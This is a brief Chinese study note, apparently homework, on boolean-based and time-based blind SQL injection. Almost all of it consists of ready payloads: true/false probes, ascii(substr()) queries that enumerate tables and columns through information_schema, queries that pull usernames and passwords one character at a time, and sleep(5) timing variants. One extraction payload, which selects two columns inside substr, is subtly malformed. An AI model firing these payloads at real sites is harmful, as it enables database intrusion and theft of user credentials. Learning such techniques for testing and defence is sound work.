基于boolean的盲注
第一步 测试
payload:’ and 1=1#(页面不变) | ’ and 1=2#(页面变化)
说明存在sql漏洞.
第二步 盲注
爆表:payload:’ and ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1))>0#
爆字段:payload:’ and ascii(substr((select column_name from information_schema.columns where table_name=‘xxxx’ limit 0,1),1,1))>0#
爆数据: payload:’ and ascii(substr((select username,password from xxxx limit 0,1),1,1))>0#
然后一点一点猜。
基于时间的盲注
第一步:同上
第二步 盲注、
爆表:payload:’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1))>0,sleep(5),1)#
爆字段:payload:’ and if(ascii(substr((select column_name from information_schema.columns where table_name=‘xxxx’ limit 0,1),1,1))>0,sleep(5),1)#
爆数据:payload:’ and if(ascii(substr((select username,password from xxxx limit 0,1),1,1))>0,sleep(5),1)#
根据是否延迟 一点一点猜。
盲注的练习(作业)
最新推荐文章于 2023-10-06 08:43:50 发布